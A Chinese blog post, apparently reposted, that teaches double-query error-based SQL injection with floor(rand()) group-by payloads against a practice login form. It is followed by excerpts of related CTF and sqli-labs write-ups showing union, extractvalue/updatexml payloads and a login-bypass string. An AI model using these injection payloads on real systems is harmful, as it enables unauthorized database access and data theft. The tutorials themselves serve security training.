sql注入-双注入

1、判断存在注入,注入方式

2、报错、不报错

 

 

 

 

union select 无法回显

 

 

 

 uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),version())%23&passwd=123456&submit=Submit

 

 
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select table_name from information_schema.tables where table_schema=database() limit 0,1))%23&passwd=123456&submit=Submit

 

感谢支持

推荐这些文章:

sql注入-----极客大挑战(hardsql)

hardsql是babysql的又一进阶,这里使用了报错注入的方法;
首先打开题目链接 我们的思路仍是使用万能密码尝试登录

 

 但是登录后发现没有仍是没有任何作用,按照往常思路继续使用 ordey by 函数和union select函数进行查询,但发现页面没有任何显示;

 

 既然之前的思路不可行,我们分析可能是数据库对 这些字符进行了过滤,既然无法这些函数就无法得到显示位,无法进行接下来的爆破,所以我们要换一种思路,既然无法构造被过滤的函数,那么我们尝试使用报错注入
这里我们使用umdatexml报错注入
首先,先获得数据库名
注入语句:...

sql注入-报错注入

extractvalue函数 和 updatexml函数 EXTRACTVALUE (XML_document, XPath_string);  第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc  第二个参数:XPath_string (Xpath格式的字符串).  作用:从目标XML中返回包含所查询值的字符串 UPDATEXML (XML_document, XPath_string, new_value);  第一个参数:XML_document是String格式,为XML文档对象的名称,文...

sql注入-字符型报错注入

试报错
看回显
暴字段
order by 3
union select 1,2,3
暴库
1,2,database()
暴表
group_concat(table_name) from information_schema.tables where table_schema =database()

group_concat(table_name) from information_schema.tables where table_schema='security' --+  
暴列
group_concat(column_name) from information...

sql-labs 第一关

?id=1 ?id=1' 和第一个结果不同?id=1 and 1=1 和第一个结果相同?id=1 and 1=2 和第一个结果相同?id=1 order by 3 和第一个结果相同?id=1 order by 100000 为什么结果都和第一个一样?id=-1 union 1,2,3 什么都不输出?id=1 union select 1,database(),3 和第一个一样?id=1' and 1=2 --+ 无输出
?id=-1 union select 1,group_concat(table_name) from information_schema.tables where tab...

CTFHub_2017-赛客夏令营-Web-injection(常规sql注入)

启动靶场,显示如下

根据题目名与url中的GET传参判断应该为注入

1.判断为整形注入
输入'(单引号) --无回显
输入1 or 1=1 --有回显

2.尝试查看列数,判断有2列
1 order by 2 --有回显
1 order by 3 --无回显

3.判断其回显点位
1111 union select 1,2 --回显2

4.查询当前数据库名
1111 union select 1,database() --回显ctfhub

5.查询表名
1111 union select 1,group_concat(t...

get型union联合一般注入流程

sqllibs下第三个靶场union select 的手注一般过程
1 寻找注入点  靶场已知注入点为 id
 
 
 
 2 判断闭合方式  
如果是错误的闭合  一开始报错  加上注释符后依然报错
反之是正确的闭合   一开始也会报错  加上注释符后就不会报错了
可以通过报错提示  寻找闭合方式
 
 
 
 
 
 
 
 
 
 
 
 
&nbs...

sql注入---极客大挑战(love easy)

 

 
 
进入题目后发现是一个登录页面,首先尝试用万能密码进行登录;

 

 
 
万能密码:1' or 1=1#
点击登录后出现了用户名,和密码,但尝试登录发现出现错误,所以继续用sql注入
在url中输入order by 查询字段
 username=admin' order by 3 %23&password=1233 (当字段为三时,页面出现正常的回显)

 
 
 
username=admin' order by 4%23&password=1233(如下图...

报错注入常用的三种注入方式(flool ,extractvalue、updatexml)

 
在学习sql注入的过程中经常会遇到一些没有显示位的sql'注入靶场,所以一般的注入的方式就无法再使用,在这种情况下我们可以使用函数报错注入的方式,通过报错查询和显示我们想要得到的数据,下面是我报错注入的三种基本方式;
(一)、extractvalue报错注入
      extractvalue函数的基本格式为:ExtractValue(xml_frag, xpath_expr)
       extractvalue函数接收两个字符串参数,一个属xml标记片段和xpath表达式xpath expr(xml是...

Mysql 主从库数据在线差异比对流程

1.  获取需要比对表的列名、主键等信息
SET sql_mode=“”;   #  需要忽略多个主键的情况,只拿其中一个主键
SELECT pk , COLUMNS , a.`TABLE_NAME` , a.`TABLE_SCHEMA`
FROM
(SELECT group_concat(`COLUMN_NAME`) as COLUMNS, `TABLE_SCHEMA`, `TABLE_NAME`  FROM `information_schema`.COLUMNS GROUP BY `TABLE_SCHEMA`, `TABLE_NAME...

【NewsCenter】攻防世界

打开这个题,发现它就一个search栏

首先尝试直接加一个单引号,回车后就报错,可以判断可能是sql注入
尝试1' order by 4#时报错

 
 
4改成3时有回显

 
 可以判断是3个字段,尝试一下联合查询-1' union select 1,2,3#

 
 能看到正常回显位,接下来就简单了,常规的sql注入看看能不能找到flag
先爆库-1' union select 1,database(),3#

 
 爆表
-1' union select 1,(select group_concat(t...

文章标题:sql注入-双注入
文章链接:https://www.dianjilingqu.com/4054.html
本文章来源于网络,版权归原作者所有,如果本站文章侵犯了您的权益,请联系我们删除,联系邮箱:saisai#email.cn,感谢支持理解。
THE END
< <上一篇
下一篇>>